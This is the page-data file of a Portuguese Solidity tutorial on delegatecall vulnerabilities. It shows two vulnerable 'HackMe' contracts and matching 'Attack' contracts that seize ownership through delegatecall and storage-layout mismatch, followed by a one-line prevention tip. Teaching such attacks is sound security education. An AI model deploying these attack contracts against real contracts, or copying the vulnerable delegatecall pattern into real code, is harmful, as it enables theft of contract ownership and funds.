{"componentChunkName":"component---src-templates-blog-page-index-tsx","path":"/chamada-de-funcao-delegatecall/","result":{"data":{"mdx":{"body":"var _excluded = [\"components\"];\n\nfunction _extends() { _extends = Object.assign ? Object.assign.bind() : function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsxRuntime classic */\n\n/* @jsx mdx */\nvar _frontmatter = {\n  \"layout\": \"BlogPage\",\n  \"title\": \"Chamada de função delegatecall\",\n  \"description\": \"Nesse artigo iremos aprender a como um contrato malicioso age para acessar e chamar as funções delegatecall e como previnir um ataque em seu contrato inteligente.\",\n  \"image\": \"capa.jpg\",\n  \"tags\": [\"Intermediário\", \"Hacks\"],\n  \"author\": [\"Matheus\"],\n  \"publishedAt\": \"21/06/2022\",\n  \"modifiedAt\": \"20220621\",\n  \"suburl\": \"chamada-de-funcao-delegatecall/\"\n};\nvar layoutProps = {\n  _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n  var components = _ref.components,\n      props = _objectWithoutProperties(_ref, _excluded);\n\n  return mdx(MDXLayout, _extends({}, layoutProps, props, {\n    components: components,\n    mdxType: \"MDXLayout\"\n  }), mdx(\"p\", null, \"Nesse artigo iremos aprender a como um contrato malicioso age para acessar e chamar as fun\\xE7\\xF5es delegatecall e como previnir um ataque em seu contrato inteligente.\"), mdx(\"h2\", {\n    \"id\": \"vulnerabilidade\"\n  }, \"Vulnerabilidade\"), mdx(\"p\", null, \"A fun\\xE7\\xE3o \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"delegatecall\"), \" \\xE9 complicada de usar e se usado de maneira errada ou compreens\\xE3o incorreta pode levar a resultados devastadores para seu contrato.\", mdx(\"br\", null), \"\\nVoc\\xEA deve manter 2 coisas em mente ao utilizar o \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"delegatecall\"), \":\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"delegatecall\"), \" preserva o contexto (armazenamento, chamador, etc...)\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"o layout de armazenamento deve ser o mesmo para a chamada da fun\\xE7\\xE3o \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"delegatecall\"), \" do contrato e para obter o contrato que est\\xE1 fazendo a chamada.\")), mdx(\"p\", null, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"Um exemplo de como um ataque funciona:\"), mdx(\"br\", null), \"\\nHackMe \\xE9 um contrato que usa \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"delegatecall\"), \" para executar um c\\xF3digo.\\nN\\xE3o \\xE9 \\xF3bvio que o propriet\\xE1rio do HackMe possa ser alterado, pois n\\xE3o h\\xE1 fun\\xE7\\xE3o dentro do HackMe para fazer isso.\", mdx(\"br\", null), \"\\nNo entanto, um invasor pode sequestrar o contrato explorando o \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"delegatecall\"), \".\"), mdx(\"p\", null, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"Vamos ver como:\")), mdx(\"ol\", null, mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Alice implanta Lib\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Alice implanta o HackMe com endere\\xE7o de Lib\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Eve implanta Ataque com endere\\xE7o de HackMe\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Eve chama \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"Attack.attack()\")), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Attack agora \\xE9 o dono do HackMe\")), mdx(\"p\", null, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"O que aconteceu?\")), mdx(\"ol\", null, mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Eve chamou \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"Attack.attack()\")), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Ataque chamou a fun\\xE7\\xE3o \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"fallback\"), \" do HackMe enviando a fun\\xE7\\xE3o seletor de \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"pwn()\"), \". HackMe encaminha a chamada para Lib usando \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"delegatecall\")), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Aqui \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"msg.data\"), \" cont\\xE9m o seletor de fun\\xE7\\xE3o de \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"pwn()\")), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Isso diz ao Solidity para chamar a fun\\xE7\\xE3o \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"pwn()\"), \" dentro da Lib\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"A fun\\xE7\\xE3o \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"pwn()\"), \" atualiza o propriet\\xE1rio para \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"msg.sender\")), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Delegatecall executa o c\\xF3digo de Lib usando o contexto de HackMe\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Portanto, o armazenamento do HackMe foi atualizado para \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"msg.sender\"), \" onde \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"msg.sender\"), \" \\xE9 o chamador de HackMe, neste caso Attack\")), mdx(\"pre\", null, mdx(\"code\", {\n    parentName: \"pre\",\n    \"className\": \"language-js\"\n  }, \"// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.13;\\n\\ncontract Lib {\\n    address public owner;\\n\\n    function pwn() public {\\n        owner = msg.sender;\\n    }\\n}\\n\\ncontract HackMe {\\n    address public owner;\\n    Lib public lib;\\n\\n    constructor(Lib _lib) {\\n        owner = msg.sender;\\n        lib = Lib(_lib);\\n    }\\n\\n    fallback() external payable {\\n        address(lib).delegatecall(msg.data);\\n    }\\n}\\n\\ncontract Attack {\\n    address public hackMe;\\n\\n    constructor(address _hackMe) {\\n        hackMe = _hackMe;\\n    }\\n\\n    function attack() public {\\n        hackMe.call(abi.encodeWithSignature(\\\"pwn()\\\"));\\n    }\\n}\\n\")), mdx(\"br\", null), mdx(\"p\", null, \"Aqui est\\xE1 outro exemplo.\", mdx(\"br\", null), \"\\nVoc\\xEA precisar\\xE1 entender como o Solidity armazena as vari\\xE1veis de estado antes de entender essa explora\\xE7\\xE3o.\"), mdx(\"p\", null, \"Esta \\xE9 uma vers\\xE3o mais sofisticada do c\\xF3digo anterior.\"), mdx(\"ol\", null, mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Alice implanta Lib e HackMe com o endere\\xE7o de Lib\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Eve implanta Ataque com o endere\\xE7o do HackMe\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Eve chama \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"Attack.attack()\")), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"Attack agora \\xE9 o dono do HackMe\")), mdx(\"p\", null, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"O que aconteceu?\"), mdx(\"br\", null), \"\\nObserve que as vari\\xE1veis de estado n\\xE3o s\\xE3o definidas da mesma maneira em Lib e HackMe.\\nIsso significa que chamar \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"Lib.doSomething()\"), \" mudar\\xE1 a primeiro vari\\xE1vel de estado dentro do HackMe, que \\xE9 o endere\\xE7o de lib.\"), mdx(\"p\", null, \"Dentro de \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"attack()\"), \", a primeira chamada para \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"doSomething()\"), \" altera o endere\\xE7o de lib para armazenar no HackMe.\\nO endere\\xE7o da lib agora est\\xE1 definido como Attack.\", mdx(\"br\", null), \"\\nA segunda chamada para \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"doSomething()\"), \" chama \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"Attack.doSomething()\"), \" e \\xE9 aqui que n\\xF3s mudamos o propriet\\xE1rio.\"), mdx(\"pre\", null, mdx(\"code\", {\n    parentName: \"pre\",\n    \"className\": \"language-js\"\n  }, \"// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.13;\\n\\ncontract Lib {\\n    uint public someNumber;\\n\\n    function doSomething(uint _num) public {\\n        someNumber = _num;\\n    }\\n}\\n\\ncontract HackMe {\\n    address public lib;\\n    address public owner;\\n    uint public someNumber;\\n\\n    constructor(address _lib) {\\n        lib = _lib;\\n        owner = msg.sender;\\n    }\\n\\n    function doSomething(uint _num) public {\\n        lib.delegatecall(abi.encodeWithSignature(\\\"doSomething(uint256)\\\", _num));\\n    }\\n}\\n\\ncontract Attack {\\n    // Verifique se o layout de armazenamento \\xE9 o mesmo do HackMe\\n    // Isso nos permitir\\xE1 atualizar corretamente as vari\\xE1veis de estado\\n    address public lib;\\n    address public owner;\\n    uint public someNumber;\\n\\n    HackMe public hackMe;\\n\\n    constructor(HackMe _hackMe) {\\n        hackMe = HackMe(_hackMe);\\n    }\\n\\n    function attack() public {\\n        // substituir endere\\xE7o de lib\\n        hackMe.doSomething(uint(uint160(address(this))));\\n        // passar qualquer n\\xFAmero como entrada, \\n        // a fun\\xE7\\xE3o doSomething() abaixo ir\\xE1 ser chamado\\n        hackMe.doSomething(1);\\n    }\\n\\n    // a assinatura da fun\\xE7\\xE3o deve corresponder a HackMe.doSomething()\\n    function doSomething(uint _num) public {\\n        owner = msg.sender;\\n    }\\n}\\n\")), mdx(\"br\", null), mdx(\"h2\", {\n    \"id\": \"técnicas-preventivas\"\n  }, \"T\\xE9cnicas Preventivas\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Usar \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"Library\"), \" sem mudan\\xE7a de estado\")), mdx(\"br\", null), mdx(\"h3\", {\n    \"id\": \"testar-no-remix\"\n  }, \"Testar no \", mdx(\"a\", {\n    parentName: \"h3\",\n    \"href\": \"https://remix.ethereum.org/\",\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }, \"Remix\")), mdx(\"br\", null), mdx(\"br\", null));\n}\n;\nMDXContent.isMDXComponent = true;","frontmatter":{"title":"Chamada de função delegatecall","description":"Nesse artigo iremos aprender a como um contrato malicioso age para acessar e chamar as funções delegatecall e como previnir um ataque em seu contrato inteligente.","image":{"childImageSharp":{"fluid":{"base64":"data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAIEA//EABQBAQAAAAAAAAAAAAAAAAAAAAD/2gAMAwEAAhADEAAAAbKNQYYP/8QAGxAAAQQDAAAAAAAAAAAAAAAAAgEEERIQISL/2gAIAQEAAQUCFYcHdBGa163j/8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPwE//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPwE//8QAHRAAAgICAwEAAAAAAAAAAAAAAREAAjFRAxAScf/aAAgBAQAGPwIg8hNrNDUYdjqB5noJ/Jnr/8QAGxAAAgIDAQAAAAAAAAAAAAAAAREAIRAxQfD/2gAIAQEAAT8hYSCOghFpHFOERBSWIRqB0dp7WP/aAAwDAQACAAMAAAAQkM//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/ED//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/ED//xAAeEAEAAgEEAwAAAAAAAAAAAAABABEhMUFhcYGR0f/aAAgBAQABPxAb3wNnMCbPzmP+JZWvYjEGClWPjELYMqko71gW3nWGheWf/9k=","aspectRatio":1.5151515151515151,"src":"/static/4d6204851247e386e17625b5cb176d70/0cb3d/capa.jpg","srcSet":"/static/4d6204851247e386e17625b5cb176d70/f836f/capa.jpg 200w,\n/static/4d6204851247e386e17625b5cb176d70/2244e/capa.jpg 400w,\n/static/4d6204851247e386e17625b5cb176d70/0cb3d/capa.jpg 536w","sizes":"(max-width: 536px) 100vw, 536px"}}},"tags":["Intermediário","Hacks"],"author":["Matheus"],"suburl":"chamada-de-funcao-delegatecall/","publishedAt":"21/06/2022","modifiedAt":"20220621"},"tableOfContents":{"items":[{"url":"#vulnerabilidade","title":"Vulnerabilidade"},{"url":"#técnicas-preventivas","title":"Técnicas Preventivas","items":[{"url":"#testar-no-remix","title":"Testar no Remix"}]}]},"timeToRead":1},"allMdx":{"nodes":[{"frontmatter":{"suburl":"sistema-de-swap-estavel-amm/","title":"Como criar um sistema de Swap estável AMM","tags":["Avançado","DeFi"]}},{"frontmatter":{"suburl":"produto-constante-amm/","title":"Como criar um produto constante AMM","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"soma-constante-amm/","title":"Como criar uma soma constante AMM","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"sistema-de-cofre/","title":"Como criar um sistema de Cofre","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"sistema-de-staking/","title":"Como criar um sistema de Staking de Recompensas","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"sistema-de-preco-chainlink-oracle/","title":"Como criar um sistema de preços Oracle","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"exemplos-de-uso-do-uniswap-v3/","title":"Exemplos de uso do Uniswap V3","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"fornecimento-unilateral-com-uniswap-v2/","title":"Fornecimento unilateral ideal com Uniswap V2","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"adicionar-e-remover-liquidez-com-uniswap-v2/","title":"Como adicionar e remover liquidez com Uniswap V2","tags":["Intermediário","Avançado","DeFi"]}},{"frontmatter":{"suburl":"swap-com-uniswap-v2/","title":"Como realizar Swap com Uniswap V2","tags":["Intermediário","DeFi"]}},{"frontmatter":{"suburl":"testes-com-echidna/","title":"Como realizar testes com Echidna","tags":["Intermediário"]}},{"frontmatter":{"suburl":"ignorar-verificacao-do-tamanho-do-contrato/","title":"Como ignorar a verificação do tamanho do contrato","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"repeticao-de-assinatura/","title":"Repetição de assinatura","tags":["Avançado","Hacks"]}},{"frontmatter":{"suburl":"manipular-timestamp-do-bloco/","title":"Manipulando o timestamp do bloco na blockchain","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"ataque-front-running/","title":"Ataque utilizando a técnica front running","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"honeypot/","title":"Criar uma armadilha para hackers com a técnica honeypot","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"ocultar-script-malicioso/","title":"Como um contrato malicioso esconde seu script","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"phishing-com-txorigin/","title":"Phishing com tx.origin","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"negacao-de-servico/","title":"Inutilizar um contrato através da negação de serviço","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"fonte-de-aleatoriedade/","title":"Fonte de Aleatoriedade","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"chamada-de-funcao-delegatecall/","title":"Chamada de função delegatecall","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"acessando-variaveis-privadas/","title":"Acessando variáveis privadas","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"auto-destruicao/","title":"Ataques com Auto-destruição","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"estouro-de-memoria/","title":"Ataques com estouro de memória","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"ataque-de-reentrada/","title":"Ataque de reentrada, aprenda como funciona e como evitar","tags":["Intermediário","Hacks"]}},{"frontmatter":{"suburl":"bloqueio-de-tempo-timelock/","title":"Criar um contrato com bloqueio de tempo","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"contrato-para-multichamadas/","title":"Criar contrato para Multichamada de funções","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"financiamento-coletivo-crowd-fund/","title":"Criar um sistema de financiamento coletivo","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"sistema-de-leilao-ingles-holandes/","title":"Criar um sistema de leilão inglês e holandês","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"canal-de-pagamento-bidirecional/","title":"Criar um Canal de pagamento bidirecional","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"canal-de-pagamento-unidirecional/","title":"Criar um Canal de pagamento unidirecional","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"gravar-dados-no-slot/","title":"Como gravar dados em qualquer slot","tags":["Intermediário","Aplicações"]}},{"frontmatter":{"suburl":"implantar-contrato-com-proxy/","title":"Como implantar qualquer contrato com Proxy","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"trabalhando-com-proxy/","title":"Trabalhando com Proxy","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"precomputar-endereco-contrato/","title":"Pré-computar endereço do Contrato com Create2","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"token-erc721/","title":"Criando nosso primeiro Token ERC721","tags":["Intermediário","Avançado","Aplicações"]}},{"frontmatter":{"suburl":"token-erc20/","title":"Criando nosso primeiro Token ERC20","tags":["Intermediário","Avançado","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-mapeamento-iteravel/","title":"Mapeamento Iterável","tags":["Intermediário","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-arvore-merkle/","title":"Árvore de Merkle","tags":["Avançado","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-multi-assinatura/","title":"Carteira com Multi-Assinaturas","tags":["Intermediário","Avançado","Aplicações"]}},{"frontmatter":{"suburl":"aplicacao-wallet/","title":"Carteira de Tokens","tags":["Iniciante","Aplicações"]}},{"frontmatter":{"suburl":"assinaturas-e-hashing-keccak/","title":"Verificando assinatura hashing com Keccak256","tags":["Intermediário","Avançado"]}},{"frontmatter":{"suburl":"abi/","title":"O que é ABI e para que serve?","tags":["Iniciante"]}},{"frontmatter":{"suburl":"import-e-libraries/","title":"Import e Libraries, para que servem?","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"criar-contrato-simples/","title":"Criar um contrato através de outro contrato","tags":["Intermediário"]}},{"frontmatter":{"suburl":"call-fallback-delegatecall/","title":"Call, Fallback, Delegatecall e chamadas de contratos","tags":["Intermediário"]}},{"frontmatter":{"suburl":"transfer-send-call/","title":"Enviar Ether com transfer, send e call","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"visibilidade-interface-pagavel/","title":"Visibilidade, Interfaces e Funções Pagáveis","tags":["Intermediário"]}},{"frontmatter":{"suburl":"evento-construtor-heranca/","title":"Evento, Construtor e Herança","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"tratamento-de-erros/","title":"Tratamento de erros de condições e exceções","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"funcoes/","title":"Funções e Modificadores","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"armazenamento/","title":"Armazenamento de Dados","tags":["Intermediário"]}},{"frontmatter":{"suburl":"estruturas/","title":"Estruturas - Struct","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"enum/","title":"Enum - Enumeradores","tags":["Iniciante","Intermediário"]}},{"frontmatter":{"suburl":"mapping-arrays/","title":"Mapping e Arrays","tags":["Iniciante"]}},{"frontmatter":{"suburl":"if-else-for-while/","title":"If, Else, For e While","tags":["Iniciante"]}},{"frontmatter":{"suburl":"ether-wei-gas/","title":"Ether, Wei e Taxa de Gas","tags":["Iniciante"]}},{"frontmatter":{"suburl":"variaveis/","title":"Entendendo as Variáveis","tags":["Iniciante"]}},{"frontmatter":{"suburl":"primeiro-aplicativo/","title":"Meu primeiro aplicativo","tags":["Iniciante","Aplicações"]}}]},"topicsYaml":{"topics":[{"desc":"Todos os conteúdos de nível iniciante estão disponíveis aqui","title":"Iniciante","url":"iniciante/"},{"desc":"Todos os conteúdos de nível intermediário estão disponíveis aqui","title":"Intermediário","url":"intermediario/"},{"desc":"Todos os conteúdos de nível avançado estão disponíveis aqui","title":"Avançado","url":"avancado/"},{"desc":"Todos os artigos referentes a exemplos de aplicações do Solidity, estão disponíveis aqui","title":"Aplicações","url":"aplicacoes/"},{"desc":"Todos os artigos referentes a exemplos de aplicação de hacks do Solidity, estão disponíveis aqui","title":"Hacks","url":"hacks/"},{"desc":"Todos os artigos referentes a exemplos de aplicação DeFi do Solidity, estão disponíveis aqui","title":"DeFi","url":"defi/"},{"desc":"Artigos de outras linguagens de programação, exemplos de interação entre a blockchain e aplicativos externos, estão disponíveis aqui","title":"Outros Artigos","url":"artigos/"}]}},"pageContext":{"suburl":"chamada-de-funcao-delegatecall/","postTopics":["Intermediário","Hacks"],"publishedAt":"21/06/2022","prevArticle":{"title":"Acessando variáveis privadas","layout":"BlogPage","suburl":"acessando-variaveis-privadas/","author":["Matheus"],"tags":["Intermediário","Hacks"],"publishedAt":"20/06/2022","modifiedAt":"20220620"},"nextArticle":{"title":"Fonte de Aleatoriedade","layout":"BlogPage","suburl":"fonte-de-aleatoriedade/","author":["Matheus"],"tags":["Intermediário","Hacks"],"publishedAt":"22/06/2022","modifiedAt":"20220622"}}},"staticQueryHashes":["119291576","2330562257","4065828390"]}